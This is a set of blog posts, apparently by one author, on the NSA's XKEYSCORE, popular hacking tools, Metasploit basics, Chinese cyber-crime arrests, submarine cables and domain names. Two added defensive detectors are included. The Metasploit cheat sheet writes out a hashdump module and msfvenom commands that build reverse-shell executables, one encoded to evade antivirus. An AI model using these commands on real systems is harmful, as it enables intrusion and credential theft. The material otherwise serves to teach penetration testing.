We all know the NSA is powerful. It can get into your email accounts and access all your private information, including your pictures, voice calls, private webcam photos (dick pics too) and your passwords, and it can even watch your Skype sessions just by typing your name and email address. And this is just the beginning. No one knows how far the NSA’s reach extends, or whether anything called “Private” still exists with the national agency lurking in the shadows, keeping an eye on you 24/7.
Now the questions that arise are “Is there any limit to the NSA’s reach?” and, more importantly, “How do they DO that?” The answer to the first question is a grim NO. The answer to the second lies in the top secret, classified 48-page documents provided by none other than NSA whistleblower Edward Snowden. The documents, which date back to 2013, were published by The Intercept on Wednesday. They have once again brought the NSA and its spying policies under scrutiny. The keyword in that pile of documents is XKEYSCORE.
XKEYSCORE is the NSA’s tool of mass surveillance. It can collect and store data from across the globe for 3 to 5 days, and the important metadata for up to 45 days. The documents reveal that there are tens of billions of records stored in the NSA’s database, while the XKEYSCORE program runs across thousands of servers globally, thus increasing its processing power and storage capabilities.
The NSA has itself referred to XKEYSCORE as its “widest reaching” system. The government agency has previously used XKEYSCORE to steal millions of encryption keys that are used to protect cell phone privacy by hacking into the world’s biggest SIM card provider, Gemalto. The program has even been used to spy on U.N. Secretary General Ban Ki-moon to learn his points of discussion before his meeting with President Barack Obama.
By Jeet Rami
Every task requires a good set of tools. This is because with the right tools in hand one can save much energy and time. In the world of cyber hacking (“cyber security”, formally) there are millions of tools available on the Internet, either as freeware or as shareware.
If you are a security researcher, pentester or system admin, you need to have these on your PCs/laptops to find vulnerabilities and plug them. Concise Courses conducted an online poll to determine the top ten hacking tools out of some of the famous ones. Here is the list that came out of the poll.

1. Nmap:  Network Mapper

Network Mapper, abbreviated as nmap, is a versatile tool for network security, plus it is free and open source. It is largely used by network administrators for network discovery and security auditing. System admins use nmap for network inventory, determining open ports, managing service upgrade schedules, and monitoring host (a term used for “a computer on a network”) or service uptime. The tool uses raw IP packets in many creative ways to determine what hosts are available on the network, what services (application name and version) they offer, which protocols are being used to provide the services, what operating systems (and OS versions and possible patches) are running, and what type and version of packet filters/firewalls are being used by the target.

2. Metasploit:

In a previous article I taught you Metasploit; you can read that article for a brief understanding. It is a tool for exploiting (utilising a network weakness to make a “backdoor”) vulnerabilities (weak points) on a network. This tool is neither free nor open source. But when it comes to the features offered, it deserves the price it claims. The Metasploit Project is a hugely popular pentesting (penetration testing) or hacking tool that is used by cybersecurity professionals and ethical hackers. Metasploit is essentially a computer security project that supplies information about known security vulnerabilities and helps to formulate penetration testing and IDS testing.

3. Cain and Abel:

Cain & Abel is a password recovery tool that is mostly used for Microsoft operating systems. This popular hacking tool allows the user to recover various kinds of passwords by sniffing the network (capturing some of the data packets) and by cracking encrypted passwords using dictionary, brute-force (generation of hashes out of words and then comparison of the encrypted hash with the generated one; this method takes less time than the dictionary attack method) and cryptanalysis attacks. Cain, as it is often referred to, can also record VoIP (Voice over IP, used for making calls over the internet) conversations, decode hashed scrambled passwords, recover wireless network keys and more. It can crack various types of hashes including NTLM, MD2, MD5, SHA-1, SHA-2 and many more. These functionalities make Cain and Abel one of the best password recovery tools.

4. Angry IP Scanner: 

Angry IP Scanner, also known as ‘ipscan’, is a freely available (open-source and cross-platform) hacking network scanner that is both fast and easy to use. The main purpose of this hacking tool is to scan IP addresses and ports to find open doors and ports. It is worth noting that Angry IP Scanner has a bunch of other uses as well. Common users of this hacking tool include network administrators and system engineers.

5. John The Ripper:

John the Ripper is a popular password cracking pentesting tool that is most commonly used to perform dictionary attacks. John the Ripper takes text string samples (from a text file, referred to as a wordlist, containing popular and complex words found in a dictionary or real passwords cracked before), encrypts them in the same way as the password being cracked (including both the encryption algorithm and key), and compares the output to the encrypted string. This tool can also be used to perform a variety of alterations to dictionary attacks, including brute-force and rainbow attacks.

6. THC Hydra:

Although often considered yet another password cracker, THC Hydra is hugely popular and has a very active and experienced development team. Essentially THC Hydra is a fast and stable network login hacking tool that will use dictionary or brute-force attacks to try various password and login combinations against a login page. This hacking tool supports a wide set of protocols including mail (POP3, IMAP, etc.), databases, LDAP (Lightweight Directory Access Protocol), SMB, VNC, and SSH (Secure Shell, used by VPN software).

7. Burp Suite:

A pentesting tool, Burp Suite has several features that can help the penetration tester or ethical hacker. Two commonly used applications within this tool are the ‘Burp Suite Spider’, which can enumerate and map out the various pages and parameters of a web site by examining cookies and initiating connections with these web applications, and the ‘Intruder’, which performs automated attacks on web applications.

8. Nessus Remote Security Scanner:

It recently went closed source, but is still essentially free. It works with a client-server framework. Nessus is the world’s most popular vulnerability scanner, used in over 75,000 organizations worldwide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications. (This tool is not in the Concise list.)

9. Ettercap:

Ettercap has a huge following and is widely used by cyber security professionals. Ettercap works by placing the user’s network interface into promiscuous mode and by ARP poisoning the target machines, i.e. facilitating a ‘Man In The Middle’ or MITM attack. (ARP, the Address Resolution Protocol, is used to determine a host’s MAC address, the address of its Network Interface Card, from its IP address. ARP poisoning is a process where a hacker gives wrong information about either its MAC or IP address to the network.) Once successful, Ettercap (and the hacker) can deploy various attacks on the victims. A popular feature of Ettercap is its ability to support various plugins.

10. Wapiti:

Wapiti has a very loyal following. As a pentesting tool (or framework), Wapiti is able to scan for and detect hundreds of possible vulnerabilities. Essentially this multi-purpose hacker tool can audit the security of web applications by performing “black-box” scans, i.e. it does not study the source code of the application but scans the HTML pages of the application, seeking scripts and forms where it can inject data.
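From the defender's side, the ARP poisoning described under Ettercap shows up on the wire as IP-to-MAC bindings that change, alternate, or collapse onto a single MAC. The following is an added example, not part of the original article: the tuple format, the addresses and the function name are assumptions made for illustration.

```python
from collections import defaultdict

# Constructed sample: (seconds, sender_ip, sender_mac) as a LAN sensor would
# extract from ARP frames. All addresses are made up for this example.
SAMPLE_ARP = [
    (0.0,  "192.168.1.1",  "aa:aa:aa:00:00:01"),   # gateway
    (1.0,  "192.168.1.20", "aa:aa:aa:00:00:20"),   # workstation
    (2.0,  "192.168.1.66", "aa:aa:aa:00:00:66"),   # third host
    (30.0, "192.168.1.1",  "aa:aa:aa:00:00:66"),   # gateway IP claimed by .66's MAC
    (30.5, "192.168.1.20", "aa:aa:aa:00:00:66"),   # workstation IP claimed too
    (31.0, "192.168.1.1",  "aa:aa:aa:00:00:01"),   # real gateway answers again
    (32.0, "192.168.1.1",  "aa:aa:aa:00:00:66"),   # forged claim repeats
]

def detect_arp_spoofing(events, pinned=None, flap_threshold=3):
    """Return (time, kind, subject, detail) alerts for suspicious ARP bindings.

    pinned: optional {ip: mac} of known-good bindings (lower-case MACs).
    """
    learned = dict(pinned or {})   # ip -> trusted MAC (pinned, else first seen)
    last_mac = {}                  # ip -> MAC in the most recent announcement
    flips = defaultdict(int)       # ip -> how often the announced MAC changed
    claimed = defaultdict(set)     # mac -> set of IPs it has announced
    alerts = []
    for ts, ip, mac in sorted(events):
        mac = mac.lower()
        claimed[mac].add(ip)
        trusted = learned.setdefault(ip, mac)
        # A MAC other than the trusted one starts announcing this IP.
        if mac != trusted and last_mac.get(ip) != mac:
            alerts.append((ts, "binding-changed", ip, f"{trusted} -> {mac}"))
        # Two hosts competing for one IP make the binding alternate.
        if ip in last_mac and last_mac[ip] != mac:
            flips[ip] += 1
            if flips[ip] == flap_threshold:
                alerts.append((ts, "flapping", ip, f"{flips[ip]} MAC changes"))
        last_mac[ip] = mac
        # One MAC answering for several IPs; fire once, on the second IP.
        if len(claimed[mac]) == 2:
            ips = ",".join(sorted(claimed[mac]))
            alerts.append((ts, "mac-claims-many", mac, ips))
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP):
        print(alert)
```

Expect benign hits from NIC replacements, DHCP reassignment and failover pairs, so review alerts against inventory. Passing the gateway's known MAC in `pinned` makes the first forged announcement alert even if the sensor starts after the poisoning began.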
If you have any favourite tool of your own which we have not mentioned in the article, kindly mention it in the comments so that we can include it in our next list.
By Jeet Rami
Metasploit Framework is an open source penetration tool used for developing and executing exploit code against a remote target machine. The Metasploit Framework has the world’s largest database of public, tested exploits. In simple words, Metasploit can be used to test the vulnerability of computer systems in order to protect them, and on the other hand it can also be used to break into remote systems.
It’s a powerful tool used for penetration testing. Learning to work with Metasploit needs a lot of effort and time. Of course, you can’t learn Metasploit overnight; it needs lots of practice and patience.

Just take a look at the following basic steps for beginners to break into a system using Metasploit after gathering some information about the target system.
1. Select the right exploit and then set the target.
2. Verify the exploit options to determine whether the target system is vulnerable to the exploit.
3. Select a payload.
4. Execute the exploit.
You must be confused!
Now carefully read the following basic terms to get an idea of the four steps mentioned above. I have defined the terms technically and, side by side, explained them in layman’s language to clarify things. I have taken the example of an attacker who wants to break into a house. I hope this approach will give you a good idea of these basic terms.
Vulnerability – A weakness which allows an attacker to break into or compromise a system’s security.
The main gate of a house with a weak lock (which can be easily opened), a glass window (which can be easily broken) and so on are the vulnerabilities in the system that make it easy for an attacker to break in.
Exploit – Code which allows an attacker to take advantage of a system’s vulnerability.
The set of different keys which he can try one by one to open the lock, the hammer he carries to break the glass window and so on are the exploits.
Payload – Actual code which runs on the system after exploitation.
Finally, after exploiting the vulnerability and breaking in, he has different things he can do. He can steal money, destroy things, or just take a look and come back. Deciding this is what we mean by setting the payload.
I hope that’s enough, friends. You will learn more in further tutorials when you start working with Metasploit practically.


Friends, in the previous article I explained what Metasploit is. Today, in this article, I will teach you the Metasploit cheat sheet. Now we start...

Download Cheat Sheet: Metasploit

Meterpreter Post Modules

With an available Meterpreter session, post modules can be run on the target machine.
Post Modules from Meterpreter
meterpreter > run post/multi/gather/env
Post Modules on a Backgrounded Session
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run

Useful Auxiliary Modules

Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DNS Enumeration
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
Proxy Server
msf > use auxiliary/server/socks4
msf > run
Any proxied traffic that matches the subnet of a route will be routed through the session specified by route.
Use proxychains configured for socks4 to route any application’s traffic through a Meterpreter session.
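For the TCP port scanner module listed above (run against 10.10.10.0/24), this is what the same activity looks like to a defender reading connection logs. It is an added example, not part of the original cheat sheet: the log format `epoch src dst dport`, the thresholds and all sample records are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

# Constructed sample connection log, one record per line: "epoch src dst dport".
SAMPLE_CONNS = (
    # one source walking ports 1-20 on a single host
    [f"{100 + i} 10.10.10.99 10.10.10.5 {port}" for i, port in enumerate(range(1, 21))]
    # one source trying port 445 on 30 hosts of the subnet
    + [f"{200 + i} 10.10.10.98 10.10.10.{host} 445" for i, host in enumerate(range(1, 31))]
    # ordinary client returning to the same service every 30 seconds
    + [f"{50 + 30 * i} 10.10.10.7 10.10.10.5 443" for i in range(10)]
)

def parse(line):
    """Split 'epoch src dst dport' into (float, str, str, int)."""
    ts, src, dst, dport = line.split()
    return float(ts), src, dst, int(dport)

def detect_scans(lines, window=60.0, min_ports=15, min_hosts=15):
    """Flag sources that touch many ports on one host (vertical scan) or the
    same port on many hosts (horizontal sweep) within `window` seconds.

    Returns {(src, kind, target): time the threshold was first reached}.
    """
    recent = defaultdict(deque)   # src -> (ts, dst, dport) records inside the window
    findings = {}
    for ts, src, dst, dport in sorted(map(parse, lines)):
        q = recent[src]
        q.append((ts, dst, dport))
        while ts - q[0][0] > window:      # expire records older than the window
            q.popleft()
        ports_on_dst = {p for _, d, p in q if d == dst}
        hosts_on_port = {d for _, d, p in q if p == dport}
        if len(ports_on_dst) >= min_ports:
            findings.setdefault((src, "vertical", dst), ts)
        if len(hosts_on_port) >= min_hosts:
            findings.setdefault((src, "horizontal", str(dport)), ts)
    return findings

if __name__ == "__main__":
    for key, first_seen in detect_scans(SAMPLE_CONNS).items():
        print(key, first_seen)
```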

msfvenom

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with ‘-l payloads’ to get a list of payloads.
$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example
Reverse Meterpreter payload as an executable and redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
Format Options (specified with -f)
--help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders’ to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example
Encode a payload from msfpayload 5 times using the shikata_ga_nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Console Basics (msfconsole)

Search for module:
msf > search [regex]
Specify an exploit to use:
msf > use exploit/[ExploitPath]
Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]
Show options for the current modules:
msf > show options
By Jeet Rami
Chinese police have arrested nearly 15,000 people on suspicion of cyber crimes as part of a sweeping six-month probe called “Operation Clean Internet”, according to a statement from the Ministry of Public Security. It also added that the suspects have been arrested for their involvement in cyber crimes that “jeopardized Internet security”.

In July, China launched a six-month campaign codenamed “Cleaning the Internet” to fight against online hackers. Police investigated 66,000 websites over hacking, online fraud and the illegal sale of personal information. They targeted websites providing “illegal and harmful information” as well as advertisements for pornography, explosives and firearms, and gambling.
In 2015 alone Chinese authorities have deleted 758,000 pieces of illegal information from Chinese websites.
By Jeet Rami
Today we are sharing a unique map that shows the submarine internet cables that power your internet. These cables are spread all around the globe and transmit about 99 percent of all international data.

The world’s internet is powered by a complex network of internet cables hidden inside the mighty oceans of Earth. These submarine cables lying on the ocean bed power your internet. Did you know that these cables are not much thicker than 8 cm and that they transmit about 99 percent of all international data?
Some of these cables are at depths up to 8,000 metres and the very first instance of submarine internet cables is found in the 1850s. These internet cables connect different countries, islands and continents. Notably, the longest of them stretches from Germany to Korea and measures about 40,000 km.

In many places, the cables simply run in straight lines. However, around smaller locations and uneven areas, the network gets much more complicated. These cables are installed using special cable-layer boats.

Using the resources from the Global Bandwidth Research Service, an animated map has been drawn in sponsorship with Huawei Marine. You can take a look at this map below or directly visit the website http://www.submarinecablemap.com/. Take a look at this map and get to know how your country gets the internet.

By Jeet Rami

1. Unique

Your domain name is a huge part of your organization’s identity – so make sure that it is as unique as your organization.
Don’t pick something that is easily confused with a competitor’s site or could lead to a different company altogether; make it unique. Try to avoid pluralization (i.e., greatshoe.com vs. greatshoes.com) because your actual name is already taken – this will only lead to lost traffic for you and a potentially higher bounce rate due to people landing on your site accidentally.

2. Easy to remember

Short and sweet is the name of the game here.
The more letters and words that make up your domain, the higher the odds that someone will get it wrong or forget it. Also, make your domain name relevant to your business so that it is easy to remember. Here’s what folks from Grasshopper said about having your name relevant to your business.

3. Use a domain tool

There are a slew of domain name tools available for free on the Web. These tools can help to break writer’s block and suggest some quality potential domain names for your review.

4. Avoid copyright infringement

Don’t use a trademarked or copyrighted phrase for your domain name: just don’t. Before you register your domain, run it through the free checkers available at http://www.copyright.gov/records/ and http://www.uspto.gov/trademarks/ to ensure you’re in the clear – it’s well worth the extra few minutes.

5. Keyword relevant

In the past, having at least one of your keywords in your domain name was paramount; however, due to the Google EMD update, this is an outdated rule. The Google EMD update – short for Exact Match Domain – is a filter that Google launched in 2012 to ensure that sites were not receiving elevated search result rankings simply because their domain name included a relevant keyword. That having been said, it is still a good idea to theme your domain name around a relevant keyword, as it will give first-time visitors an immediate idea as to exactly what you offer.

6. Write it out and read it repeatedly before purchasing

One of the great things about a domain name is that it’s yours forever (as long as you keep up the payments, anyways). One of the bad things about a domain name is that you can’t change it after you purchase it. That said, if your business is named Dickson Web, carefully consider your domain name before purchasing – www.dicksonweb.com is likely to attract a whole other kind of audience.
Avoid a PR catastrophe by writing your potential domain name out and reading it repeatedly before making the purchase. Do one better and run it by a few good friends or family members before committing.

7. Avoid punctuation and numbers

Punctuation is confusing – simply put. Most reputable URLs are plain text and putting in a hyphen is only going to increase your chances of losing traffic to other sites; after all people are used to typing plain text in the URL bar. Also, avoid numbers whenever possible – though there may be an understandable exception to the rule if your business name includes a number.

8. Buy other similar domains and use them as redirects

Consider the investment you have already made in your organization: protect your brand and capture all potentially misdirected traffic by also purchasing the domains that are similar to your actual domain name.

9. Be wary of the domain extension

There are .com, .net, .org, .biz, and a slew of other domain extensions. While .net may save you a few bucks, at the end of the day is it really worth the savings? While there are some cases that a .biz may have merit – and certainly .org has its purposes – most of the time, a .com is going to be your best bet. Don’t fall into purchasing an off extension simply because your domain is already taken as a .com – instead, rethink your domain name unless there is a more prevalent reason for choosing an alternate extension.

10. Be direct

Obviously, there are certain phrases or words that are bound to draw people in… but unless they’re your target audience, all the traffic in the world won’t make a difference. Make sure that your domain name is to the point and direct about who you are and/or what it is that you provide.

By Jeet Rami